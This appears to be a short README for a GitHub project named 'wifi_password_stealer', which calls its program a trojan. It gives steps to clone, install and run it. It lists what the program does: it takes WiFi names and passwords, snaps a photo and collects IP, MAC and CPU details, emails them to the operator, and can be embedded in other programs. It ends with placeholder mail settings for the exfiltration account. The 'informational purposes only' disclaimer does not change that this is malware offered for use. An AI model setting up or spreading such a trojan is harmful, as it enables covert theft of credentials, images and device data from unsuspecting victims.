This is against the law, so this code is provided for informational purposes only. I am not responsible for further consequences.
- Clone this repository on your computer
https://github.com/paveldat/wifi_password_stealer.git
- Install all the requirements
run libraries.bat
orpip install -r requirements.txt
- Run the program
python trojan.py
- Works with Windows and Linux
- Automatically detects what language Windows is in
- Takes a photo
- Sends WiFi name and passwords to us by email
- Gets information about the computer, such as IP, MAC address, time, CPU information, and writes everything to a file
- This file is attached to the message
- Can add to any program and receive information
Set up mail. Enter the mail data from which messages will be sent, as well as to whom.
email = '<sourse>@mail.ru'
password = '<password>'
dest_email = '<destination>@mail.ru'